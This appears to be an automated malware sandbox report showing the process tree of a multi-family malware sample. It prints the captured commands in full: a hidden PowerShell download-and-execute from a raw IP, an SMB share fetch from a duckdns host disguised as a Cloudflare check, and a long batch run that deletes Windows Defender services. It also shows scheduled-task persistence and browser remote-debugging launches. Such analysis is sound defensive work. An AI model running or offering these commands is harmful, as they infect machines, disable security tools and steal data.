105 PID 5176 wrote to memory of 2508 5176 rapes.exe 105 PID 5176 wrote to memory of 1444 5176 rapes.exe 106 PID 5176 wrote to memory of 1444 5176 rapes.exe 106 PID 5176 wrote to memory of 1444 5176 rapes.exe 106 PID 1444 wrote to memory of 1768 1444 cmd.exe 108 PID 1444 wrote to memory of 1768 1444 cmd.exe 108 PID 1444 wrote to memory of 1768 1444 cmd.exe 108 PID 1768 wrote to memory of 3320 1768 powershell.exe 109 PID 1768 wrote to memory of 3320 1768 powershell.exe 109 PID 1768 wrote to memory of 3320 1768 powershell.exe 109 PID 3320 wrote to memory of 5308 3320 cmd.exe 111 PID 3320 wrote to memory of 5308 3320 cmd.exe 111 PID 3320 wrote to memory of 5308 3320 cmd.exe 111 PID 5176 wrote to memory of 4544 5176 rapes.exe 114 PID 5176 wrote to memory of 4544 5176 rapes.exe 114 PID 5176 wrote to memory of 4544 5176 rapes.exe 114 PID 4544 wrote to memory of 3696 4544 apple.exe 115 PID 4544 wrote to memory of 3696 4544 apple.exe 115 PID 4544 wrote to memory of 3696 4544 apple.exe 115 PID 3696 wrote to memory of 4528 3696 272.exe 117 PID 3696 wrote to memory of 4528 3696 272.exe 117 PID 4528 wrote to memory of 6116 4528 cmd.exe 119 PID 4528 wrote to memory of 6116 4528 cmd.exe 119 PID 4528 wrote to memory of 6116 4528 cmd.exe 119 PID 6116 wrote to memory of 5952 6116 272.exe 120 PID 6116 wrote to memory of 5952 6116 272.exe 120 PID 5952 wrote to memory of 3076 5952 cmd.exe 122 PID 5952 wrote to memory of 3076 5952 cmd.exe 122 PID 5952 wrote to memory of 3800 5952 cmd.exe 123 PID 5952 wrote to memory of 3800 5952 cmd.exe 123 PID 5952 wrote to memory of 4948 5952 cmd.exe 124 PID 5952 wrote to memory of 4948 5952 cmd.exe 124 PID 5952 wrote to memory of 3552 5952 cmd.exe 125 PID 5952 wrote to memory of 3552 5952 cmd.exe 125 PID 5952 wrote to memory of 4040 5952 cmd.exe 126 PID 5952 wrote to memory of 4040 5952 cmd.exe 126 PID 5952 wrote to memory of 3032 5952 cmd.exe 127 PID 5952 wrote to memory of 3032 5952 cmd.exe 127 PID 5952 wrote to memory of 60 5952 cmd.exe 128 PID 5952 wrote to memory of 60 5952 cmd.exe 128 PID 5952 wrote to memory of 5792 5952 cmd.exe 129 PID 5952 wrote to memory of 5792 5952 cmd.exe 129 PID 5952 wrote to memory of 2828 5952 cmd.exe 130 PID 5952 wrote to memory of 2828 5952 cmd.exe 130 PID 5952 wrote to memory of 2748 5952 cmd.exe 131 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-04-04_b19ff2ebc03f382529b2f8802b4bf39c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-04_b19ff2ebc03f382529b2f8802b4bf39c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3664 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn wlkDSmavZCz /tr "mshta C:\Users\Admin\AppData\Local\Temp\GrV9nDPUO.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn wlkDSmavZCz /tr "mshta C:\Users\Admin\AppData\Local\Temp\GrV9nDPUO.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4232
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\GrV9nDPUO.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:532 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JR6VYZW9SZEC2YDOIAKPGGVFWVXFFQKW.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Users\Admin\AppData\Local\TempJR6VYZW9SZEC2YDOIAKPGGVFWVXFFQKW.EXE"C:\Users\Admin\AppData\Local\TempJR6VYZW9SZEC2YDOIAKPGGVFWVXFFQKW.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5500 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5176 -
C:\Users\Admin\AppData\Local\Temp\10447710101\7q8Wm5h.exe"C:\Users\Admin\AppData\Local\Temp\10447710101\7q8Wm5h.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2508
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10449261121\pfJNmVW.cmd"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process cmd -ArgumentList '/c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall' -windowstyle hidden -Verb RunAs; # Cloudflare verification (Ray ID: 90b0e54eb8bdaasd84)7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall8⤵
- Suspicious use of WriteProcessMemory
PID:3320 -
C:\Windows\SysWOW64\net.exenet use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234!9⤵
- System Location Discovery: System Language Discovery
PID:5308
-
-
\??\UNC\aaso12.duckdns.org\shear\s.exe\\aaso12.duckdns.org\shear\s -fullinstall9⤵
- Sets service image path in registry
- Drops file in Program Files directory
PID:2072
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10449770101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10449770101\apple.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\Users\Admin\AppData\Local\Temp\272.exe"C:\Users\Admin\AppData\Local\Temp\272.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3696 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A46E.tmp\A46F.tmp\A470.bat C:\Users\Admin\AppData\Local\Temp\272.exe"8⤵
- Suspicious use of WriteProcessMemory
PID:4528 -
C:\Users\Admin\AppData\Local\Temp\272.exe"C:\Users\Admin\AppData\Local\Temp\272.exe" go9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:6116 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A577.tmp\A578.tmp\A579.bat C:\Users\Admin\AppData\Local\Temp\272.exe go"10⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:5952 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"11⤵
- Launches sc.exe
PID:3076
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:3800
-
-
C:\Windows\system32\timeout.exetimeout /t 111⤵
- Delays execution with timeout.exe
PID:4948
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:3552
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:4040
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3032
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:60
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"11⤵
- Launches sc.exe
PID:5792
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"11⤵
- Launches sc.exe
PID:2828
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f11⤵PID:2748
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"11⤵
- Launches sc.exe
PID:1200
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"11⤵
- Launches sc.exe
PID:1132
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f11⤵PID:5920
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"11⤵
- Launches sc.exe
PID:3464
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"11⤵
- Launches sc.exe
PID:5056
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f11⤵PID:2552
-
-
C:\Windows\system32\sc.exesc stop "Sense"11⤵
- Launches sc.exe
PID:4660
-
-
C:\Windows\system32\sc.exesc delete "Sense"11⤵
- Launches sc.exe
PID:4076
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f11⤵PID:2976
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"11⤵
- Launches sc.exe
PID:4080
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"11⤵
- Launches sc.exe
PID:5824
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f11⤵
- Modifies security service
PID:1472
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"11⤵
- Launches sc.exe
PID:4600
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"11⤵
- Launches sc.exe
PID:1232
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f11⤵PID:3052
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"11⤵
- Launches sc.exe
PID:64
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"11⤵
- Launches sc.exe
PID:1128
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f11⤵PID:4868
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"11⤵
- Launches sc.exe
PID:1864
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"11⤵
- Launches sc.exe
PID:5948
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f11⤵PID:224
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:1000
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:1296
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f11⤵PID:6132
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"11⤵
- Launches sc.exe
PID:4996
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"11⤵
- Launches sc.exe
PID:5260
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f11⤵PID:6068
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"11⤵
- Launches sc.exe
PID:2832
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"11⤵
- Launches sc.exe
PID:5636
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f11⤵PID:6100
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"11⤵
- Launches sc.exe
PID:1604
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"11⤵
- Launches sc.exe
PID:2144
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f11⤵PID:1792
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"11⤵
- Launches sc.exe
PID:812
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"11⤵
- Launches sc.exe
PID:5144
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f11⤵PID:4832
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"11⤵
- Launches sc.exe
PID:452
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"11⤵
- Launches sc.exe
PID:1584
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f11⤵PID:1148
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"11⤵
- Launches sc.exe
PID:2348
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"11⤵
- Launches sc.exe
PID:3784
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f11⤵PID:5788
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"11⤵
- Launches sc.exe
PID:5024
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"11⤵
- Launches sc.exe
PID:5736
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f11⤵PID:4668
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f11⤵PID:1480
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f11⤵PID:5608
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f11⤵PID:548
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f11⤵PID:4924
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:3344
-
-
C:\Windows\system32\sc.exesc delete ddrver11⤵
- Launches sc.exe
PID:868
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10451760101\amnew.exe"C:\Users\Admin\AppData\Local\Temp\10451760101\amnew.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2404 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"7⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:3816 -
C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4720 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4492 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"10⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1732 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8cc4bdcf8,0x7ff8cc4bdd04,0x7ff8cc4bdd1011⤵PID:5692
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1976,i,7112146777192356314,507647694044397789,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1972 /prefetch:211⤵PID:6128
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2204,i,7112146777192356314,507647694044397789,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2224 /prefetch:311⤵PID:1124
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2356,i,7112146777192356314,507647694044397789,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2436 /prefetch:811⤵PID:4176
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3200,i,7112146777192356314,507647694044397789,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3248 /prefetch:111⤵
- Uses browser remote debugging
PID:5668
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,7112146777192356314,507647694044397789,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3268 /prefetch:111⤵
- Uses browser remote debugging
PID:2444
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4244,i,7112146777192356314,507647694044397789,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4256 /prefetch:211⤵
- Uses browser remote debugging
PID:4700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4416,i,7112146777192356314,507647694044397789,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4608 /prefetch:111⤵
- Uses browser remote debugging
PID:2760
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5152,i,7112146777192356314,507647694044397789,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5160 /prefetch:811⤵PID:2072
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5528,i,7112146777192356314,507647694044397789,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5552 /prefetch:811⤵PID:2224
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"10⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:1332 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2b0,0x7ff8c806f208,0x7ff8c806f214,0x7ff8c806f22011⤵PID:3236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1848,i,9482335374978990092,7415510844180558427,262144 --variations-seed-version --mojo-platform-channel-handle=2200 /prefetch:311⤵PID:4444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2172,i,9482335374978990092,7415510844180558427,262144 --variations-seed-version --mojo-platform-channel-handle=2168 /prefetch:211⤵PID:2260
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2528,i,9482335374978990092,7415510844180558427,262144 --variations-seed-version --mojo-platform-channel-handle=2712 /prefetch:811⤵PID:3168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3472,i,9482335374978990092,7415510844180558427,262144 --variations-seed-version --mojo-platform-channel-handle=3524 /prefetch:111⤵
- Uses browser remote debugging
PID:5448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3492,i,9482335374978990092,7415510844180558427,262144 --variations-seed-version --mojo-platform-channel-handle=3528 /prefetch:111⤵
- Uses browser remote debugging
PID:548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5236,i,9482335374978990092,7415510844180558427,262144 --variations-seed-version --mojo-platform-channel-handle=5296 /prefetch:811⤵PID:4664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5232,i,9482335374978990092,7415510844180558427,262144 --variations-seed-version --mojo-platform-channel-handle=5320 /prefetch:811⤵PID:4556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5696,i,9482335374978990092,7415510844180558427,262144 --variations-seed-version --mojo-platform-channel-handle=5704 /prefetch:811⤵PID:4548
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"10⤵
- Uses browser remote debugging
PID:6056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"10⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:1924 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2ac,0x7ff8c8d8f208,0x7ff8c8d8f214,0x7ff8c8d8f22011⤵PID:2440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2052,i,11066578728689828154,15266822345346334515,262144 --variations-seed-version --mojo-platform-channel-handle=2044 /prefetch:211⤵PID:6212
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1728,i,11066578728689828154,15266822345346334515,262144 --variations-seed-version --mojo-platform-channel-handle=2096 /prefetch:311⤵PID:6228
-
-
